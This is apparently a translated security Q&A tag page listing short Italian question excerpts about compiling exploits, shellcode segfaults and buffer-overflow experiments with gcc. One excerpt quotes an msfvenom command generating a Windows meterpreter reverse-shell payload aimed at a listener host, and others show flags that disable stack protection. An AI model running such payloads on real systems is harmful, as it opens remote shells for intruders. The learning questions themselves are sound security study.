Domande con tag 'gcc'

1
risposta

Problema di compilazione degli exploit [chiuso]

Sto cercando di compilare il seguente exploit: link Ma ottieni il seguente errore: local.c:12:22: fatal error: asm/page.h: No such file or directory compilation terminated.     
posta 03.11.2013 - 14:42
1
risposta

lo stato di ASLR, PIE, SSP su Debian nel 2018?

Per quanto mi ricordo, la maggior parte dei pacchetti Debian Wheezy non sono stati compilati con quegli utili indicatori di sicurezza (ASLR, PIE, SSP e altro). La situazione è migliorata con Debian Squeeze o il prossimo Debian Buster? In c...
posta 10.08.2018 - 13:04
1
risposta

Errore di segmentazione nello shellcode

Ho generato un codice shell con msfvenom # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=7878 -f c -o shell.c Quando compilo il mio shell.c con gcc (versione 6.3.0-16) con questa opzione: # gcc -o shell shell.c # gc...
posta 12.05.2017 - 01:28
1
risposta

Problemi di test del buffer overflow

Sto sperimentando sul mio computer, quindi ho scritto un programma vulnerabile in C per testare i buffer overflow su: #include <stdio.h> #include <string.h> #include <stdlib.h> int check_password(char *password){ int ret...
posta 07.12.2016 - 05:38
1
risposta

Il codice shell non è stato eseguito correttamente

Sono riuscito a far sì che shellcode venisse indicato da eip creando il mio eseguibile senza misure di sicurezza. Tuttavia, non sembra essere eseguito. Ecco la fonte C del mio programma vulnerabile: #include <stdio.h> #include <...
posta 08.12.2016 - 04:49
0
risposte

Perchè -fstack-protector ottimizza se una funzione non assegna un array di 8 o più byte?

In base al documento delle opzioni di strumentazione gcc , il -fstack-protector protegge solo contro "funzioni che chiamano alloca e funziona con buffer superiori a 8 byte." Come sono i buffer più grandi di 8 byte diversi da quelli che sono...
posta 15.09.2016 - 05:53
2
risposte

Non riesco a far funzionare il semplice gestore di shellcode [chiuso]

Sto solo provando ad eseguire shellcode direttamente dalla riga di comando. Invio un semplice NP 0x90 e ottengo un errore di segmentazione? root@server:~# gcc shellcode.c -o shellrun -fno-stack-protector -z execstack root@server:~# ./shellrun...
posta 30.11.2014 - 06:17